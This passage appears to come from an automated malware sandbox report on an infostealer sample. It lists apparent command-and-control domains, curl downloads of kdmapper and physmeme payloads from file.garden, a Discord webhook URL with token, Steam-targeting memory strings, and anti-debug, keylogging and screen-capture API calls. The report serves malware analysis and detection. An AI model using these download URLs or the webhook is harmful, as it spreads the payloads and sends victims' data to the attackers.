                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: adcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.co equals www.youtube.com (Youtube)
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: adcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.coN equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: file.garden
                                Source: global trafficDNS traffic detected: DNS query: tiddymarktwo.shop
                                Source: global trafficDNS traffic detected: DNS query: surveriysiop.shop
                                Source: global trafficDNS traffic detected: DNS query: captainynfanw.shop
                                Source: global trafficDNS traffic detected: DNS query: tearrybyiwo.shop
                                Source: global trafficDNS traffic detected: DNS query: appleboltelwk.shop
                                Source: global trafficDNS traffic detected: DNS query: tendencerangej.shop
                                Source: global trafficDNS traffic detected: DNS query: fossillargeiw.shop
                                Source: global trafficDNS traffic detected: DNS query: coursedonnyre.shop
                                Source: global trafficDNS traffic detected: DNS query: strappystyio.shop
                                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                Source: global trafficDNS traffic detected: DNS query: offeviablwke.site
                                Source: global trafficDNS traffic detected: DNS query: zelensky.top
                                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                Source: powershell.exe, 0000001F.00000002.2033274385.000001E66D2E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                                Source: powershell.exe, 0000001E.00000002.1903468013.000001BEF2E4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 0000001E.00000002.1741738289.000001BEE3008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1741738289.000001BEE2DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E654E51000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001E.00000002.1741738289.000001BEE3008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                Source: powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: 4tXm5yPtiy.exeString found in binary or memory: http://www.houseindustries.com/license
                                Source: 4tXm5yPtiy.exeString found in binary or memory: http://www.houseindustries.com/licenseBurbank
                                Source: 4tXm5yPtiy.exeString found in binary or memory: http://www.houseindustries.com/licenseCopyright
                                Source: 4tXm5yPtiy.exeString found in binary or memory: http://www.houseindustries.comhttp://www.talleming.comHouse
                                Source: powershell.exe, 0000001F.00000002.2016540956.000001E66D0F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top
                                Source: msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top/
                                Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
                                Source: powershell.exe, 0000001E.00000002.1741738289.000001BEE2DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E654E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                Source: 4tXm5yPtiy.exeString found in binary or memory: https://auth.gg/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
                                Source: powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coursedonnyre.shop/api
                                Source: 4tXm5yPtiy.exeString found in binary or memory: https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO
                                Source: curl.exe, 00000004.00000002.1488445675.00000288C36E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1488186724.00000288C371A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1488145977.00000288C3719000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1488445675.00000288C36F3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1488506178.00000288C371A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1488268329.00000288C371A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
                                Source: curl.exe, 00000004.00000002.1488445675.00000288C36E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
                                Source: curl.exe, 00000004.00000002.1488445675.00000288C36F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binM6
                                Source: curl.exe, 00000004.00000002.1488445675.00000288C36E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binp.F
                                Source: curl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
                                Source: curl.exe, 00000007.00000002.1504104457.000001FB23F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
                                Source: curl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin:l
                                Source: curl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binrc
                                Source: powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                                Source: powershell.exe, 0000001E.00000002.1903468013.000001BEF2E4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/api
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site:443/api
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/p3W
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strappystyio.shop/api
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surveriysiop.shop/api02
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiddymarktwo.shop/api(3
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.co
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.coN
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.84.213:443 -> 192.168.2.8:49711 version: TLS 1.2
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B492CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF68B492CE0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B492CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF68B492CE0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B492A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memcpy,free,GlobalUnlock,CloseClipboard,0_2_00007FF68B492A90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,11_2_00438E3C
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4BB2D0 GetAsyncKeyState,exit,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF68B4BB2D0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C36B0 PeekMessageA,TranslateMessage,DispatchMessageA,GetForegroundWindow,GetWindow,SetWindowPos,GetClientRect,ClientToScreen,GetCursorPos,GetAsyncKeyState,SetWindowPos,GetClientRect,QueryPerformanceCounter,GetKeyState,GetKeyState,GetKeyState,ClientToScreen,SetCursorPos,GetActiveWindow,GetCursorPos,ScreenToClient,GetAsyncKeyState,rand,GetAsyncKeyState,free,DestroyWindow,_invalid_parameter_noinfo_noreturn,0_2_00007FF68B4C36B0

                                System Summary

                                barindex
                                Source: physmeme.exe.7.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 360448
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4760
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C3ED0: CreateThread,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,system,system,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,MessageBoxA,system,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,DeviceIoControl,MessageBoxA,exit,CloseHandle,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,DefWindowProcA,LoadIconA,LoadCursorA,LoadIconA,GetDesktopWindow,GetWindowRect,RegisterClassExA,CreateWindowExA,SetWindowLongA,DwmExtendFrameIntoClientArea,ShowWindow,SetWindowPos,SetLayeredWindowAttributes,UpdateWindow,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,0_2_00007FF68B4C3ED0
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD00_2_00007FF68B4B4BD0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CA2A00_2_00007FF68B4CA2A0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B43000_2_00007FF68B4B4300
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B47600_2_00007FF68B4B4760
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C3ED00_2_00007FF68B4C3ED0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B48F4800_2_00007FF68B48F480
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4AE4B00_2_00007FF68B4AE4B0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B49D4700_2_00007FF68B49D470
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4BECD00_2_00007FF68B4BECD0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4824F00_2_00007FF68B4824F0
